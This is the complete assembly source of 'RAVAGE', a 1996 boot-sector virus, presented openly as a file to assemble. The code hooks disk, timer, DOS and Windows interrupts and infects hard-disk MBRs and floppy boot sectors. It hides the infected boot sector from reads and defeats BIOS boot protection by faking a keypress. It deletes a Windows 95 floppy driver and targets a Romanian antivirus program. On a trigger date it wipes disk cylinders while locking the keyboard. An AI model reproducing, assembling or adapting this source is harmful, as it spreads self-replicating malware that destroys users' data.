; RAVAGE BSV Written by RP & muRPhy October 1996 ; version 9.0 [ New Generation ] -- WIN95 compatible :-) ; ;Replicator module (c) 1994-96 RP, Bucharest ;Tips & tricks (c) 1995-96 muRPhy, Bucharest ;Final version full options Warning!!! Distructive sequence included! ;This source code is for educational purposes only. The author is not ;responsible for any problems caused due to the assembly of this file" .286 code segment assume cs:code org 100h start: q db 7b00h dup(90h) timer equ 08h jmp begin bootrecord db 32 dup(0) ;min=32 ;............. Entry point .............................. begin: push cs mov di,414h; steal 1k of RAM pop ds mov byte ptr ds:[04a1h],0eah ;pun cod de jmp xxxx:xxxx pt INT 40H dec di ;added code for jmp xxxx:xxxx for INT 40H dec ds:word ptr[di] mov ax,ds:word ptr[di] shl ax,6 ;only >80186 sub ax,07c0h push ax push ax ;....................................................... mov ax,0201h; read the other sector of the virus push cs pop es mov bx,7e00h mov cx,000fh cxpar equ this word mov dx,0080h dxpar equ this word int 13h mov word ptr ds:[offset temp-2],609Ch ;refac cod de pushf pusha ;restoring code for pushf pusha ; mov bx,0100h ;get original INT 40H mov bh,01 ;bl already 00 from bx=7e00 les ax,[bx] mov ds:[int40seg],es ;store original INT 40H mov ds:[int40ofs],ax ;....................................................... pop ax mov bx,04a2h ;prepare code at 0:4a1h for jmp xxxx:xxxx mov [bx],offset int40 mov word ptr [bx+02],ax mov bx,004ch; get & corrupt int 13h xchg ds:[bx+2],ax mov ds:[int13seg],ax mov ax,offset int13 xchg ds:[bx],ax mov ds:[int13ofs],ax ;....................................................... pop es mov si,7c00h; transfer virus code mov di,si cld xor cx,cx mov ch,02 ;anti TBAV flag O rep movsw cli mov ax,es ;get & corrupt INT 08H ; mov bx,timer*4 mov bl,timer*4 ;bh already 00 from bx=004ch xchg ds:[bx+2],ax mov es:[int08seg],ax mov ax,offset int08 xchg ds:[bx],ax mov es:[int08ofs],ax mov ax,0201h ; fast boot infector sequence mov dx,0080h inc cx int 13h call testziuaz ; is it trash day ? cmp dx,0303h ziuaz equ this word jnz boot jmp entry boot: int 19h ;------------------- int 40h jmpint40: db 0eah int40ofs dw 0 int40seg dw 0 ;----------------- Corrupted entry in INT 40H int40: cmp ah,02h jnz jmpint40 cmp cx,0001 jnz jmpint40 or dh,dh jnz jmpint40 call disketa jmp short verificare ;................. jmp int 13 ............................ jmpint13: db 0eah; jmp xxxx:xxxx int13ofs dw 0 int13seg dw 0 ;........................................................... cmp03: cmp ah,03 jne jmpint13 cmp dl,80h jb jmpint13 jmp short contcmp ;........................................................... int13: ; FAR PROCEDURE FOR HANDLING INTERRUPT 13H cmp ah,02h jnz cmp03 ;--- cmp dl,80h ;pe HDD jb contcmp or dh,dh ;head 0? jnz contcmp cmp cx,000eh ;se redirecteaza 14 si 15 pe 13 presupus cu zerouri jz fak ;sau cu orice altceva cmp cx,000fh ;show instead of sectors 14 and 15 , sector 13 jnz contcmp ;sector 13 supposed zeroed or whatever ;not quite good implemented but works anyway fak: mov cl,0dh jmp jmpint13 ;--- contcmp: cmp cx,0001 jnz jmpint13 or dh,dh; <=> cmp dh,00 jnz jmpint13 cmp dl,80h jae hard call disketa jmp short verificare hard: call callint13; it was requested a read action for the boot verificare: jc giveup cmp es:word ptr[bx+1bch],0202h; is it infected? jz showboot call compute mov ax,0301h; write real boot on computed sector call callint13 jnc continue clearerr: clc giveup: retf 0002 showboot: call compute mov ax,0201h call callint13 jmp short giveup ;------------------------- continue: push es push bx push cs pop es mov ax,0301h; write the other sector of the virus inc cx mov cs:[offset cxpar-2],cx mov cs:[offset dxpar-2],dx mov bx,7e00h call callint13 pop bx pop es jc clearerr push es push bx push ds push si push di push es pop ds push cs pop es mov si,bx add si,1beh; copy the partition into the virus code mov di,7dbeh mov cl,21h cld rep movsw mov si,bx; copy the boot record into the virus code add si,3 mov di,7c03h mov cl,16 rep movsw cmp dl,80h jb normal ;----- pusha mov ah,05; bypass BIOS protection;place Y into keyboard buffer. mov cl,59h int 16h call resetcmosflag inc cs:word ptr [counter] call testziuaz mov al,dh cmp al,09h ja maimare ;"maimare " means "greater than" add al,12h ;in Romanian language, of course... daa maimare: sub al,09h das mov dh,al mov cs:word ptr [offset ziuaz-2],dx popa ;----- normal: inc cx ;salvez cx=0000 cu pusha dupa rep movsw =>cx=0001 ;cx=0000 saved by pusha after rep movsw =>cx=0001 iar: mov ax,0301h; write the virus onto the disk mov bx,7c00h xor dh,dh call callint13 jc iar call resetkeyboard afar: pop di pop si pop ds pop bx pop es jmp giveup disketa: pushf call cs:dword ptr [int40ofs] ret counter dw 0 virsign dw 0202h partition1 db 80h,01h,01,00,06,0eh,201,231,11h,0,0,0,07,228,03,00 ;take care (this is my partition) ;you'll have to change this with yours db 30h dup (0) db 55h,0aah ;............ Second sector .............................. int2f: ;FAR PROCEDURE FOR HANDLING INTERRUPT 2FH pushf pusha push ds push es xor bx,bx mov ds,bx mov bx,07b4h cmp ax,1605h ;is it Init Windows ? jne cont2f mov ax,cs:[int13ofs] ;restore original handler of INT 13H mov ds:[bx],ax mov ds:[bx+0806h-07b4h],ax mov ax,cs:[int13seg] mov ds:[bx+2],ax mov ds:[bx+2+0806h-07b4h],ax mov ah,62h ;Get Active PSP segment int 21h mov ds,bx mov ax,ds:[002ch] ;Get environment segment mov es,ax xor di,di cld mov cx,0050h mov al,'o' repnz scasb cmp es:[di],'to' ; winbootdir? jnz jmpint2f add di,+06 push es pop ds mov dl,ds:[di] sub dl,'C'-2 mov ah,0eh int 21h push di pop dx mov ah,3bh ;Change Directory to folder of WIN95 int 21h ; ; apelul windows de genul: ; win setup.exe nu se va realiza cum trebuie ; ;I guess if someone'll run something like ;win setup.exe worse things'll happen ;doesn't matter anyway (few of them will ;run win in this way) push cs pop ds mov ah,41h ; Unlink ds:dx mov dx,offset floppydriver int 21h ;ideal ar fi sa nu dea eroare AX=1606h ;here I suppose AX will differ from 1606h ;more than that...I'm sure AX <> 1606h cont2f: cmp ax,1606h ;is it Exit Windows? jne jmpint2f mov ax,offset int13 ;corrupt again handler of INT 13H mov ds:[bx],ax mov ds:[bx+0806h-07b4h],ax mov ds:[bx+2],cs mov ds:[bx+2+0806h-07b4h],cs cmp byte ptr ds:[04a6h],0DAH ;is flag set ? jz entry jmpint2f: pop es pop ds popa popf db 0eah; jmp xxxx:xxxx int2fofs dw 0 int2fseg dw 0 ;---------------------------------- entry: push cs pop ds mov si,offset txt-1 video: mov ax,0010h int 10h mov ah,0eh mov bl,0ah repeta: std lodsb cmp al,'$' jz distroi int 10h jmp short repeta distroi: mov cx,0001h destroyagain: mov ax,030eh mov dx,0180h call callint13 call resetcmosflag in al,21h ;disable keyboard or al,02 out 21h,al inc ch jnz destroyagain ; add cl,40h ;for all existing cylinders > 256 jmp short destroyagain ;..........................INT 21H int21: pushf pusha push ds push es mov di,dx xor ah,4bh jnz oldint21 push ds pop es xor al,al cld mov cl,0ffh repnz scasb std mov al,'\' repnz scasb mov ax,ds:[di+02] and ax,0dfdfh cmp ax,'AR' jnz oldint21 mov ah,ds:[di+04] and ah,0dfh cmp ah,'V' jnz oldint21 mov al,01 out 70h,al in al,71h cmp al,126 ;max value for counter jne ravnormal mov ax,1600h ;checking Win active int 2fh or al,al jz entry ;al=0 means Win not active xor ax,ax mov ds,ax mov byte ptr ds:[04a6h],0DAh ;set flag on low memory jmp short oldint21 ;------------------------ ravnormal: inc ax push ax mov al,01 out 70h,al pop ax out 71h,al oldint21: pop es pop ds popa popf db 0eah; JMP xxxx:xxxx int21ofs dw 0 int21seg dw 0 ;............... INT 08H ....................................... int08: pushf pusha temp equ this word push es push ds xor di,di ;DI=0000h mov ds,di ;DS=0000h mov ax,0b8ah mov es,ax cld mov ax,'EP' mov cx,0ffffh ;"cautare" means "searching" ;for those of you who don't speak ; Romanian language ;-) cautare: repnz scasw or cx,cx jz notyet cmp es:[di],'=C' jnz cautare push cs pop ax ; ax =residseg mov di,02fh*4 ;Save segment INT 2Fh xchg [di+02],ax ;Corrupt segment 2FH mov cs:[int2fseg],ax mov ax,offset int2f ;Save & corrupt offset INT 2FH xchg [di],ax mov cs:[int2fofs],ax push cs pop ax mov di,021h*4 ;Save segment INT 21h xchg [di+02],ax ;Corrupt segment 21H mov cs:[int21seg],ax mov ax,offset int21 ;Save & corrupt offset INT 21H xchg [di],ax mov cs:[int21ofs],ax ;Command.com alocat inc word ptr ds:[0413h] ;refac la 0:413h ;restoring 0:413h mov bx,0100h mov word ptr ds:[bx],04a1h ;corrupt INT 40 to point 0:04a1h mov word ptr ds:[bx+02],0 ;to a jmp far code mov word ptr cs:[offset temp-2],[(offset peste)-(offset temp)] shl 8+ 0ebh ; dezactiveaza rutina de pe system timer (INT 08H) ; disabling (handler) routine for INT 08H notyet: pop ds pop es popa popf peste equ this word db 0eah int08ofs dw 0 int08seg dw 0 floppydriver db 'system\iosubsys\hsflop.pdr',0 testziuaz: mov ah,04 int 1ah cmp dl,28h jbe nochange mov dl,28h nochange: ret callint13: pushf call cs:dword ptr[int13ofs] ret resetcmosflag: mov al,01 out 70h,al mov al,100 ;set counter in CMOS for RAV out 71h,al ; RAV stands for Romanian AntiVirus ret ;an AV prog from ROMANIA compute: mov cl,14 cmp dl,80h jae back mov dh,1 mov al,es:byte ptr[bx+15h] cmp al,240; f0h 1.44 disk je back mov cl,3 back: ret resetkeyboard: cmp dl,80h jb nu xor bx,bx mov ds,bx mov bl,1eh mov ds:[041ah],bx mov ds:[041ch],bx nu: ret ; '$RAVage is wiping data! RP&muRPhy ' text db '$yhPRum&PR !atad gnipiw si egaVAR' txt equ this word code ends end start muRPhy (c)96